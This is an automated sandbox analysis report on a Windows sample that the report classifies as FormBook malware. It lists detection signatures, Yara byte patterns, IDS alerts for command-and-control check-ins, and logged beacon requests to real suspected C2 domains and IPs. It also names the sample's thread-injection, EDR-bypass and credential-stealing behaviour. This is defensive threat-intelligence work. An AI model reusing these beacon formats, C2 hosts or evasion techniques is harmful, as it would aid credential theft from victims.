Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
NjjLYnPSZr.exe

Overview

General Information

Sample name:NjjLYnPSZr.exe
renamed because original name is a hash value
Original sample name:2fc1d7f69545d2931aa3f9ce5f9cb5e038027f20200e9b416befea7465413f32.exe
Analysis ID:1530786
MD5:8a6aa375bc5ca6ea45711462189103cb
SHA1:dfd00591e07f55a69cb29ffdba5af54bd1a4e3ea
SHA256:2fc1d7f69545d2931aa3f9ce5f9cb5e038027f20200e9b416befea7465413f32
Tags:exeuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • NjjLYnPSZr.exe (PID: 7524 cmdline: "C:\Users\user\Desktop\NjjLYnPSZr.exe" MD5: 8A6AA375BC5CA6EA45711462189103CB)
    • XFLTednCZUTqje.exe (PID: 6040 cmdline: "C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • compact.exe (PID: 7836 cmdline: "C:\Windows\SysWOW64\compact.exe" MD5: 5CB107F69062D6D387F4F7A14737220E)
        • XFLTednCZUTqje.exe (PID: 5856 cmdline: "C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • firefox.exe (PID: 8012 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.3604353824.00000000035A0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.3604353824.00000000035A0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13f2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000006.00000002.3606411027.0000000005500000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.3606411027.0000000005500000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x54494:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x3c603:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000002.00000002.3604571155.0000000003490000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.NjjLYnPSZr.exe.df0000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          0.2.NjjLYnPSZr.exe.df0000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e393:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

          Sigma Signatures

          No Sigma rule has matched

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-10T14:46:06.642558+020028554651A Network Trojan was detected192.168.2.4497363.33.130.19080TCP
          2024-10-10T14:46:29.886009+020028554651A Network Trojan was detected192.168.2.44978334.120.137.4180TCP
          2024-10-10T14:46:44.155602+020028554651A Network Trojan was detected192.168.2.4498603.33.130.19080TCP
          2024-10-10T14:46:57.569118+020028554651A Network Trojan was detected192.168.2.44995481.88.48.7180TCP
          2024-10-10T14:47:11.618796+020028554651A Network Trojan was detected192.168.2.450020162.209.189.21280TCP
          2024-10-10T14:47:24.928033+020028554651A Network Trojan was detected192.168.2.450024162.0.213.7280TCP
          2024-10-10T14:47:38.379854+020028554651A Network Trojan was detected192.168.2.450028104.21.21.23080TCP
          2024-10-10T14:47:51.684273+020028554651A Network Trojan was detected192.168.2.45003284.32.84.3280TCP
          2024-10-10T14:48:05.336208+020028554651A Network Trojan was detected192.168.2.450036109.234.166.18080TCP
          2024-10-10T14:48:18.611444+020028554651A Network Trojan was detected192.168.2.4500403.33.130.19080TCP
          2024-10-10T14:48:33.197843+020028554651A Network Trojan was detected192.168.2.451590118.99.50.880TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-10T14:46:22.302776+020028554641A Network Trojan was detected192.168.2.44973834.120.137.4180TCP
          2024-10-10T14:46:24.790179+020028554641A Network Trojan was detected192.168.2.44975434.120.137.4180TCP
          2024-10-10T14:46:27.343329+020028554641A Network Trojan was detected192.168.2.44976534.120.137.4180TCP
          2024-10-10T14:46:35.519675+020028554641A Network Trojan was detected192.168.2.4498173.33.130.19080TCP
          2024-10-10T14:46:39.184581+020028554641A Network Trojan was detected192.168.2.4498333.33.130.19080TCP
          2024-10-10T14:46:41.731630+020028554641A Network Trojan was detected192.168.2.4498453.33.130.19080TCP
          2024-10-10T14:46:49.955226+020028554641A Network Trojan was detected192.168.2.44990181.88.48.7180TCP
          2024-10-10T14:46:52.466500+020028554641A Network Trojan was detected192.168.2.44992281.88.48.7180TCP
          2024-10-10T14:46:55.114187+020028554641A Network Trojan was detected192.168.2.44993881.88.48.7180TCP
          2024-10-10T14:47:03.960118+020028554641A Network Trojan was detected192.168.2.449993162.209.189.21280TCP
          2024-10-10T14:47:06.543580+020028554641A Network Trojan was detected192.168.2.450006162.209.189.21280TCP
          2024-10-10T14:47:09.117961+020028554641A Network Trojan was detected192.168.2.450019162.209.189.21280TCP
          2024-10-10T14:47:17.275044+020028554641A Network Trojan was detected192.168.2.450021162.0.213.7280TCP
          2024-10-10T14:47:19.839459+020028554641A Network Trojan was detected192.168.2.450022162.0.213.7280TCP
          2024-10-10T14:47:22.358268+020028554641A Network Trojan was detected192.168.2.450023162.0.213.7280TCP
          2024-10-10T14:47:30.763063+020028554641A Network Trojan was detected192.168.2.450025104.21.21.23080TCP
          2024-10-10T14:47:33.338917+020028554641A Network Trojan was detected192.168.2.450026104.21.21.23080TCP
          2024-10-10T14:47:36.343667+020028554641A Network Trojan was detected192.168.2.450027104.21.21.23080TCP
          2024-10-10T14:47:44.012329+020028554641A Network Trojan was detected192.168.2.45002984.32.84.3280TCP
          2024-10-10T14:47:46.589247+020028554641A Network Trojan was detected192.168.2.45003084.32.84.3280TCP
          2024-10-10T14:47:49.136453+020028554641A Network Trojan was detected192.168.2.45003184.32.84.3280TCP
          2024-10-10T14:47:57.431921+020028554641A Network Trojan was detected192.168.2.450033109.234.166.18080TCP
          2024-10-10T14:47:59.963184+020028554641A Network Trojan was detected192.168.2.450034109.234.166.18080TCP
          2024-10-10T14:48:02.639515+020028554641A Network Trojan was detected192.168.2.450035109.234.166.18080TCP
          2024-10-10T14:48:10.886896+020028554641A Network Trojan was detected192.168.2.4500373.33.130.19080TCP
          2024-10-10T14:48:13.527787+020028554641A Network Trojan was detected192.168.2.4500383.33.130.19080TCP
          2024-10-10T14:48:16.087396+020028554641A Network Trojan was detected192.168.2.4500393.33.130.19080TCP
          2024-10-10T14:48:25.616555+020028554641A Network Trojan was detected192.168.2.451587118.99.50.880TCP
          2024-10-10T14:48:28.080678+020028554641A Network Trojan was detected192.168.2.451588118.99.50.880TCP
          2024-10-10T14:48:30.686701+020028554641A Network Trojan was detected192.168.2.451589118.99.50.880TCP
          2024-10-10T14:48:41.113723+020028554641A Network Trojan was detected192.168.2.45159123.249.190.3580TCP
          2024-10-10T14:48:43.444739+020028554641A Network Trojan was detected192.168.2.45159223.249.190.3580TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: NjjLYnPSZr.exeAvira: detected
          Multi AV Scanner detection for submitted file
          Source: NjjLYnPSZr.exeReversingLabs: Detection: 60%
          Yara detected FormBook
          Source: Yara matchFile source: 0.2.NjjLYnPSZr.exe.df0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.3604353824.00000000035A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.3606411027.0000000005500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.3604571155.0000000003490000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1971161309.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.3604458798.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1971118603.0000000000D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1971533263.0000000001E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.3603288385.00000000030E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Machine Learning detection for sample
          Source: NjjLYnPSZr.exeJoe Sandbox ML: detected
          Source: NjjLYnPSZr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: NjjLYnPSZr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: compact.pdbGCTL source: NjjLYnPSZr.exe, 00000000.00000003.1970894978.000000000091D000.00000004.00000020.00020000.00000000.sdmp, XFLTednCZUTqje.exe, 00000002.00000002.3604055024.0000000001108000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: XFLTednCZUTqje.exe, 00000002.00000000.1894942549.0000000000B6E000.00000002.00000001.01000000.00000005.sdmp, XFLTednCZUTqje.exe, 00000006.00000002.3603415797.0000000000B6E000.00000002.00000001.01000000.00000005.sdmp
          Source: Binary string: wntdll.pdbUGP source: NjjLYnPSZr.exe, 00000000.00000002.1971204229.000000000118E000.00000040.00001000.00020000.00000000.sdmp, NjjLYnPSZr.exe, 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, NjjLYnPSZr.exe, 00000000.00000003.1879483342.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp, NjjLYnPSZr.exe, 00000000.00000003.1881085129.0000000000E40000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000005.00000002.3604665421.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000005.00000003.1972841113.0000000003633000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000005.00000003.1971132275.0000000003487000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000005.00000002.3604665421.000000000397E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: NjjLYnPSZr.exe, NjjLYnPSZr.exe, 00000000.00000002.1971204229.000000000118E000.00000040.00001000.00020000.00000000.sdmp, NjjLYnPSZr.exe, 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, NjjLYnPSZr.exe, 00000000.00000003.1879483342.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp, NjjLYnPSZr.exe, 00000000.00000003.1881085129.0000000000E40000.00000004.00000020.00020000.00000000.sdmp, compact.exe, compact.exe, 00000005.00000002.3604665421.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000005.00000003.1972841113.0000000003633000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000005.00000003.1971132275.0000000003487000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000005.00000002.3604665421.000000000397E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: compact.pdb source: NjjLYnPSZr.exe, 00000000.00000003.1970894978.000000000091D000.00000004.00000020.00020000.00000000.sdmp, XFLTednCZUTqje.exe, 00000002.00000002.3604055024.0000000001108000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_030FC340 FindFirstFileW,FindNextFileW,FindClose,5_2_030FC340
          Source: C:\Windows\SysWOW64\compact.exeCode function: 4x nop then xor eax, eax5_2_030E9B10

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49738 -> 34.120.137.41:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49736 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49754 -> 34.120.137.41:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49765 -> 34.120.137.41:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49817 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49783 -> 34.120.137.41:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49922 -> 81.88.48.71:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49938 -> 81.88.48.71:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49901 -> 81.88.48.71:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49954 -> 81.88.48.71:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49833 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49860 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50038 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50022 -> 162.0.213.72:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50023 -> 162.0.213.72:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50006 -> 162.209.189.212:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50019 -> 162.209.189.212:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50030 -> 84.32.84.32:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50024 -> 162.0.213.72:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49993 -> 162.209.189.212:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50035 -> 109.234.166.180:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50039 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50029 -> 84.32.84.32:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50033 -> 109.234.166.180:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:51587 -> 118.99.50.8:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:51591 -> 23.249.190.35:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49845 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50036 -> 109.234.166.180:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:51588 -> 118.99.50.8:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50020 -> 162.209.189.212:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:51590 -> 118.99.50.8:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50028 -> 104.21.21.230:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50027 -> 104.21.21.230:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50025 -> 104.21.21.230:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:51589 -> 118.99.50.8:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50021 -> 162.0.213.72:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50034 -> 109.234.166.180:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50026 -> 104.21.21.230:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50037 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:51592 -> 23.249.190.35:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50031 -> 84.32.84.32:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50040 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50032 -> 84.32.84.32:80
          Performs DNS queries to domains with low reputation
          Source: DNS query: www.beescy.xyz
          Source: Joe Sandbox ViewIP Address: 162.0.213.72 162.0.213.72
          Source: Joe Sandbox ViewIP Address: 84.32.84.32 84.32.84.32
          Source: Joe Sandbox ViewASN Name: O2SWITCHFR O2SWITCHFR
          Source: Joe Sandbox ViewASN Name: ACPCA ACPCA
          Source: Joe Sandbox ViewASN Name: CNSERVERSUS CNSERVERSUS
          Source: Joe Sandbox ViewASN Name: FTG-AS-APForewinTelecomGroupLimitedISPatHK FTG-AS-APForewinTelecomGroupLimitedISPatHK
          Source: unknownTCP traffic detected without corresponding DNS query: 118.99.50.8
          Source: unknownTCP traffic detected without corresponding DNS query: 118.99.50.8
          Source: unknownTCP traffic detected without corresponding DNS query: 118.99.50.8
          Source: unknownTCP traffic detected without corresponding DNS query: 118.99.50.8
          Source: unknownTCP traffic detected without corresponding DNS query: 118.99.50.8
          Source: unknownTCP traffic detected without corresponding DNS query: 118.99.50.8
          Source: unknownTCP traffic detected without corresponding DNS query: 118.99.50.8
          Source: unknownTCP traffic detected without corresponding DNS query: 118.99.50.8
          Source: unknownTCP traffic detected without corresponding DNS query: 118.99.50.8
          Source: unknownTCP traffic detected without corresponding DNS query: 118.99.50.8
          Source: unknownTCP traffic detected without corresponding DNS query: 118.99.50.8
          Source: unknownTCP traffic detected without corresponding DNS query: 118.99.50.8
          Source: unknownTCP traffic detected without corresponding DNS query: 118.99.50.8
          Source: unknownTCP traffic detected without corresponding DNS query: 118.99.50.8
          Source: unknownTCP traffic detected without corresponding DNS query: 118.99.50.8
          Source: unknownTCP traffic detected without corresponding DNS query: 118.99.50.8
          Source: unknownTCP traffic detected without corresponding DNS query: 118.99.50.8
          Source: unknownTCP traffic detected without corresponding DNS query: 118.99.50.8
          Source: unknownTCP traffic detected without corresponding DNS query: 118.99.50.8
          Source: unknownTCP traffic detected without corresponding DNS query: 118.99.50.8
          Source: unknownTCP traffic detected without corresponding DNS query: 118.99.50.8
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /dcai/?Sh=JzKwzxEjjJDs1ynMHer+TNevqF7oFKk+RBNCM6w6NpGOWZMZrcBh0esk0Vp2cdNARH8NLeIYDalhXOdQ0Ma7tvgTEF7hsrDYV+tcKJvJSVI5izhoL98hwXM=&f6SpQ=_n84nZ4HGta HTTP/1.1Host: www.sacidasorte.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
          Source: global trafficHTTP traffic detected: GET /o1rp/?Sh=TBsR9lfn+qQhrzhd4VN7whgaax1SSLbEYlfYc+CfPbvAogjyvhThgxnzNfioE4F1AGXhUEA9gsdduAUKMlkxrWhulp0A29FjViMz3Iaz4UFzPouUBmhdpGY=&f6SpQ=_n84nZ4HGta HTTP/1.1Host: www.yosoyemy.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
          Source: global trafficHTTP traffic detected: GET /uqfz/?Sh=mcURcygGZpi8BUAEri2LzCX8yukoHIUSB9ATV0AA66/eXSD2DbYq2fDOBcTf2y0GiA7pk1o8xA7eBrRh6Cv9Vx9YWZ7NmBQtUSw3jvSSlGdRHD15Z6r2w2o=&f6SpQ=_n84nZ4HGta HTTP/1.1Host: www.go2super.appAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
          Source: global trafficHTTP traffic detected: GET /3nzp/?Sh=PglkqFvbbyb87SegldF7644R50nw13706su3sEKMhHJ419d8UFlSgmN6uEUbiABfJzkrsK6wePLWTRJFKAJP15xlx/rUOqsRMQGimgyXa3wd/uL7sq2sISc=&f6SpQ=_n84nZ4HGta HTTP/1.1Host: www.corverd.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
          Source: global trafficHTTP traffic detected: GET /x35b/?Sh=fVDKJz+SStMVbfQUmkYKwfd/Kz5vW54YQ3dZU+tucUYAFBvCN7d4q6mFay3q8TR2KAYtpV66b4jE73PrL/8YW0e6Mz+digafyc3ZonBVmSzoReAw1BtBLHs=&f6SpQ=_n84nZ4HGta HTTP/1.1Host: www.66hc7.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
          Source: global trafficHTTP traffic detected: GET /m4qv/?Sh=P2TusARkbEgcEs+mDyMHtP9emvoSKlJZWWEgC4tjmOg8nAhT+FFe9yeelcBnkIXwjfDCMJlqRnnZfo12xo8UG7kWIL0+yfipd64llhGw+b1VwhgkmL0TKqs=&f6SpQ=_n84nZ4HGta HTTP/1.1Host: www.beescy.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
          Source: global trafficHTTP traffic detected: GET /7ug6/?f6SpQ=_n84nZ4HGta&Sh=IXJECadondWQh91fX6gMxPrxehpEbK/sXgmpgogo4Iy+9wWP8KKNSUdB/sGHFOlG3Y0hTlB2s4BH9YC5SvgzHxgsSlTs6mELWZRATho00JDOVx4L12qgKBs= HTTP/1.1Host: www.personalcaresale.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
          Source: global trafficHTTP traffic detected: GET /wzoz/?Sh=Ppcgdv6DrtqpILZ3xPy0g9msApc+gUIN/EMWlKKGCKnUGKGSiYq02Q3K9hPbzriSr907/cLUuPH0KiO46gsbjuqN2MfoymjOpxTW14iCTowXcyBnLNm1v4w=&f6SpQ=_n84nZ4HGta HTTP/1.1Host: www.ainude2.cloudAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
